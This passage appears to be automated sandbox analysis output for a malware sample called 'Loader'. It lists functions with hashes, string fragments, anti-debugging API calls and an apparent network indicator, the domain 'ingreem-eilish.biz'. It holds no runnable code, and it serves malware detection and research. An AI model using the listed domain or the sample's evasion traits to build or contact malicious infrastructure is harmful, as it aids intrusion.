                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: '$.$`$m$x
                                                                                        • API String ID: 0-658611574
                                                                                        • Opcode ID: fd5b69244993d46e929284a9bdd3bf796c8df4c9b55dffd7aefbb48e1f1effbb
                                                                                        • Instruction ID: 2144aee67b07277a24bb181582e3d7a2e9ec39ed2a6ddb42bc05191b79a9b14a
                                                                                        • Opcode Fuzzy Hash: fd5b69244993d46e929284a9bdd3bf796c8df4c9b55dffd7aefbb48e1f1effbb
                                                                                        • Instruction Fuzzy Hash: 1522F67250C7908BC7249F3884913EFBBE1ABD5324F194A2FE5E9973E1D67888418B47
                                                                                        Function 00409150 Relevance: 6.7, Strings: 5, Instructions: 441COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $869$2841$<5%"$LG$yx
                                                                                        • API String ID: 0-1687199681
                                                                                        • Opcode ID: 81a90c5b949388645e4c4577b2877a3cec77f85482f17fa4fd1f021cc46f1452
                                                                                        • Instruction ID: 6e29797cb701a68307395225b6e7be505ceeebb86d1407f7b9dd9bd878f88501
                                                                                        • Opcode Fuzzy Hash: 81a90c5b949388645e4c4577b2877a3cec77f85482f17fa4fd1f021cc46f1452
                                                                                        • Instruction Fuzzy Hash: 82C1247260C3914BD7158E29C4503ABBFE2ABD6204F18897EE8D59B3C3C67DC806C766
                                                                                        Function 00426A30 Relevance: 6.7, Strings: 5, Instructions: 423COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $XZ$6t2v$k$TV$\^
                                                                                        • API String ID: 0-467934898
                                                                                        • Opcode ID: 3bf4fda654a8a1ef6a7daa7ad6e16e634f12e1109e43140abed9d35ced868f0f
                                                                                        • Instruction ID: b605e89531a81705ebfe3af5fac37aee9194eb61735b639e3b3a85eadae14b77
                                                                                        • Opcode Fuzzy Hash: 3bf4fda654a8a1ef6a7daa7ad6e16e634f12e1109e43140abed9d35ced868f0f
                                                                                        • Instruction Fuzzy Hash: B5E1F0B5608340DFE7209F14EC81B6FB7E0FB8A304F55892DE6C59B2A1DB359815CB4A
                                                                                        Function 00409600 Relevance: 6.6, Strings: 5, Instructions: 348COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "7-0$,-$0$A313BACE34A2B05E25E054D164A37606$XO
                                                                                        • API String ID: 0-2755594900
                                                                                        • Opcode ID: 96ffc6abc21e90aa4f60c2ac5e4c014c751766b9a0af1ae67335a06f1a6e3ed3
                                                                                        • Instruction ID: b14e87bd0a1771ab9c69b1f7aba9e5e6c348a9572cac4b455d4e49c452734ab2
                                                                                        • Opcode Fuzzy Hash: 96ffc6abc21e90aa4f60c2ac5e4c014c751766b9a0af1ae67335a06f1a6e3ed3
                                                                                        • Instruction Fuzzy Hash: 4FB1E5B16083409BD718DF25D8519AFBBE6EBC2314F14892DE0D69B382D738D50ACB5A
                                                                                        Function 00423FA0 Relevance: 6.6, Strings: 5, Instructions: 300COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: A%g'$Q5j7$`a$bBB$rBB
                                                                                        • API String ID: 0-1327514492
                                                                                        • Opcode ID: 11854e9d01787bcabf0a5723583f3a9d661c6e82951057df82fbc47dee04596a
                                                                                        • Instruction ID: 84e825f8253b53e153d6fc107475a3046bb70845801fbe9f3bd419ebf7740313
                                                                                        • Opcode Fuzzy Hash: 11854e9d01787bcabf0a5723583f3a9d661c6e82951057df82fbc47dee04596a
                                                                                        • Instruction Fuzzy Hash: EB9100B5A083409FD714CF28E84175BBBE0FBCA708F508A2DF5959B382D774A905CB86
                                                                                        Function 00408EF0 Relevance: 6.5, Strings: 5, Instructions: 251COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: +$40$c$xs$+
                                                                                        • API String ID: 0-1069988977
                                                                                        • Opcode ID: 0213a91b2d80012fb1b31493f043b6b78dca9e3c88a933d5aecf2aab1307a7db
                                                                                        • Instruction ID: 337f816b89ebe18a5921aad55b72e827079c057bc6ea50a272954d896ed24b54
                                                                                        • Opcode Fuzzy Hash: 0213a91b2d80012fb1b31493f043b6b78dca9e3c88a933d5aecf2aab1307a7db
                                                                                        • Instruction Fuzzy Hash: D461F22154D3D28AE3019F79949036BFFE0AFA3350F18456EE8D41B382D77A890AD766
                                                                                        Function 011C47BC Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 011C47C8
                                                                                        • IsDebuggerPresent.KERNEL32 ref: 011C4894
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 011C48AD
                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 011C48B7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                        • String ID:
                                                                                        • API String ID: 254469556-0
                                                                                        • Opcode ID: a7d96cb1e2d558c8280ff9b68b85d891296b3ea81b2c8327dba79c6ca80b74c4
                                                                                        • Instruction ID: b0f13fe9655b6acfa788fababa438da2a8c0595fb022619199caeb1e87aca2f6
                                                                                        • Opcode Fuzzy Hash: a7d96cb1e2d558c8280ff9b68b85d891296b3ea81b2c8327dba79c6ca80b74c4
                                                                                        • Instruction Fuzzy Hash: 50311875D062299BDF21EFA4D9497CDBBB8AF18704F1041AAE40CAB240EB709A84CF45
                                                                                        Function 011C46A3 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 011C46B5
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 011C46C4
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 011C46CD
                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 011C46DA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                        • String ID:
                                                                                        • API String ID: 2933794660-0
                                                                                        • Opcode ID: 9a636d5796887f43aa66b35729ae550750b6e45f9f73b07dca059b58692eeb33
                                                                                        • Instruction ID: c037ae53e2741cfe5d1e278cccd328068a01863ae5e71d1cc9f2f688d72b6fda
                                                                                        • Opcode Fuzzy Hash: 9a636d5796887f43aa66b35729ae550750b6e45f9f73b07dca059b58692eeb33
                                                                                        • Instruction Fuzzy Hash: 1CF06774D1220DEBCB14EBB4D6899DEB7F4FF1C204B5145A6A412E7104E734A7849F50
                                                                                        Function 0041E790 Relevance: 5.9, Strings: 4, Instructions: 901COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "=$5$&[da$'%.W$\X
                                                                                        • API String ID: 0-3996675343
                                                                                        • Opcode ID: 72735fe613da29a2a9f30f99bcf3e8ab70917fe6899e91424263f497d90dfd44
                                                                                        • Instruction ID: 1f7b9d891a837fd2c1889f1d16761606eef6dcf163077f6c21b04c916aa521c0
                                                                                        • Opcode Fuzzy Hash: 72735fe613da29a2a9f30f99bcf3e8ab70917fe6899e91424263f497d90dfd44
                                                                                        • Instruction Fuzzy Hash: E662597450C3919BC321CF25C8506ABBFE1AF95314F1887BEE8E44B392D7398946C796
                                                                                        Function 004339F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: MetricsSystem
                                                                                        • String ID:
                                                                                        • API String ID: 4116985748-3916222277
                                                                                        • Opcode ID: e1c78a85c073594b75890c03197e051504a5e28f3cbe51423f7dbecb5aa6b388
                                                                                        • Instruction ID: 9919e99d947470de0ad43a1edc8932ab1666953d7c59876c21ae7e6382b5c0c6
                                                                                        • Opcode Fuzzy Hash: e1c78a85c073594b75890c03197e051504a5e28f3cbe51423f7dbecb5aa6b388
                                                                                        • Instruction Fuzzy Hash: 735161B4E152189FDB40EFACD98569DBBF0BB88300F114529E498E7360D734AD84CF96
                                                                                        Function 0040DF04 Relevance: 5.3, Strings: 4, Instructions: 339COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 255B$8A23$C566$E5E1
                                                                                        • API String ID: 0-3367982953
                                                                                        • Opcode ID: f0eae71c9d6d3c7835d1a474653f2e65b944a28a3ad533d021ed57ddccbba122
                                                                                        • Instruction ID: c9ab22a39130a17e05ee61a651d87010c03896c5afd99520b9bc1921e18da37f
                                                                                        • Opcode Fuzzy Hash: f0eae71c9d6d3c7835d1a474653f2e65b944a28a3ad533d021ed57ddccbba122
                                                                                        • Instruction Fuzzy Hash: 03A12B316593924BD3348B258C91BEBBBE1EBD2314F088A7DD4D897792F73848069792
                                                                                        Function 0042822E Relevance: 5.3, Strings: 4, Instructions: 270COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: XY$AC$IK$MO
                                                                                        • API String ID: 0-664538580
                                                                                        • Opcode ID: af46b7993aa1ccbcd2e1645b036d6b68a91456e6c26b5bb98e83f5d9dfdf7b8c
                                                                                        • Instruction ID: 39428194e500b5a53c6aae23f15327502ea0c60e828c0b8a3651ea1546d1f37d
                                                                                        • Opcode Fuzzy Hash: af46b7993aa1ccbcd2e1645b036d6b68a91456e6c26b5bb98e83f5d9dfdf7b8c
                                                                                        • Instruction Fuzzy Hash: 9A8124B6A09310DFD7109F25E84172FB7E1ABC5304F154A3EE98597381EB38E9058B8B
                                                                                        Function 0040E59D Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 301COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Uninitialize
                                                                                        • String ID: D$ingreem-eilish.biz
                                                                                        • API String ID: 3861434553-1775330692
                                                                                        • Opcode ID: 1a2b36ded3d63c48934e883b06f9b4d8cc45036b94076ba770b07ddeb3608e72
                                                                                        • Instruction ID: 22ccddc28fc708269306c978beef408f1ed5ca82190ea807a368fb49a74d3678
                                                                                        • Opcode Fuzzy Hash: 1a2b36ded3d63c48934e883b06f9b4d8cc45036b94076ba770b07ddeb3608e72
                                                                                        • Instruction Fuzzy Hash: 5BA1F17550C3928BD739CF268450BEBBBE2AFE2300F18896DD0D55B392D7790906CB96
                                                                                        Function 011C8BE4 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 011C8CDC
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 011C8CE6
                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 011C8CF3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                        • String ID:
                                                                                        • API String ID: 3906539128-0
                                                                                        • Opcode ID: 00981c66348ef0b40980e0599513f82ba3030a5fc14f887ac0b7f6b99a15c40c
                                                                                        • Instruction ID: 3975b60bd4dc0c5d8961d89020e3bd2951ce568611fdd286b67ab9a976b19b5d
                                                                                        • Opcode Fuzzy Hash: 00981c66348ef0b40980e0599513f82ba3030a5fc14f887ac0b7f6b99a15c40c
                                                                                        • Instruction Fuzzy Hash: AA31E87490122DABCB25DF68D8887DDBBB8BF18710F5041EAE41CA7250E7709F858F45
                                                                                        Function 004277A0 Relevance: 4.4, Strings: 3, Instructions: 632COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: :>8.$=81;$SO
                                                                                        • API String ID: 0-596420614
                                                                                        • Opcode ID: b862dca480a246b022d7e0da2e616d285275df2dc89570896f01fd18fba204d9
                                                                                        • Instruction ID: e0f39ee0ef8aad66e5f4eb59653e3d911f017b98dc62c0ad19d3a25678c4c286
                                                                                        • Opcode Fuzzy Hash: b862dca480a246b022d7e0da2e616d285275df2dc89570896f01fd18fba204d9
                                                                                        • Instruction Fuzzy Hash: B81233B1A0C351CBC7148F25E84166BBBE1EF86318F18886EE5D58B342E739D906CB57
                                                                                        Function 00F1DA80 Relevance: 4.2, Strings: 3, Instructions: 486COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: =$W<$].
                                                                                        • API String ID: 0-346867940
                                                                                        • Opcode ID: 8b8bc62358491bb0bb9e4ed2def56676a28b6e9853effc2d684f76f6b0b2f10f
                                                                                        • Instruction ID: 62d96ae4b2894c4899798aef787fca2a9be0c63ec6b680157ec9a328cbfb3df3
                                                                                        • Opcode Fuzzy Hash: 8b8bc62358491bb0bb9e4ed2def56676a28b6e9853effc2d684f76f6b0b2f10f
                                                                                        • Instruction Fuzzy Hash: C0029D32A433558FC32CDE6DF9D21A4B7E4F79832974442BBD968CB2C8E3655889D780
                                                                                        Function 0041542D Relevance: 4.2, Strings: 3, Instructions: 445COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: M99$M99${
                                                                                        • API String ID: 0-726366120
                                                                                        • Opcode ID: 4518d23ef3c3a1572746b5f32e4e7f738ad1ec23c563525293a5832030b7192f
                                                                                        • Instruction ID: f63e886754d2f8b0a4918178e697645c79cb63f24128d1e0e3a60bf90f675cf0
                                                                                        • Opcode Fuzzy Hash: 4518d23ef3c3a1572746b5f32e4e7f738ad1ec23c563525293a5832030b7192f
                                                                                        • Instruction Fuzzy Hash: 76E1F675208381CBD724CF28D8957EBBBE2EFD5304F18886DE4D987292D7389846CB56
                                                                                        Function 00428889 Relevance: 4.1, Strings: 3, Instructions: 378COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LoWf$dUgS$y}zN
                                                                                        • API String ID: 0-3353942304
                                                                                        • Opcode ID: c56ece68d25b053fc45e7bbabff213bb9af3a884a6344b36a553f0283c3d2f6e
                                                                                        • Instruction ID: 9afdd42b56ae40ab4dd5e281407d5461c0fd8baedc768c94432ec64788af82fb
                                                                                        • Opcode Fuzzy Hash: c56ece68d25b053fc45e7bbabff213bb9af3a884a6344b36a553f0283c3d2f6e
                                                                                        • Instruction Fuzzy Hash: 60E13775609391CFD714CF28E8A071EBBE2FF8A314F45866DE4955B3A2C7349940CB4A
                                                                                        Function 00F03010 Relevance: 3.8, Strings: 2, Instructions: 1258COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: T$(
                                                                                        • API String ID: 0-912061130
                                                                                        • Opcode ID: 798c944a0b5ea13ddaf8aa9a95a2fe42bedcd817a1115da83d9037213bbee807
                                                                                        • Instruction ID: 93989ace4de276bdb8e310f1c7634ed97050259def6c9c4e49c5709f4a117206
                                                                                        • Opcode Fuzzy Hash: 798c944a0b5ea13ddaf8aa9a95a2fe42bedcd817a1115da83d9037213bbee807
                                                                                        • Instruction Fuzzy Hash: 6EB29032E022598FCB18CFADE8925EDBBF4FB58324B04417AD868E7384E3355985DB50
                                                                                        Function 00404C60 Relevance: 3.3, Strings: 2, Instructions: 819COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
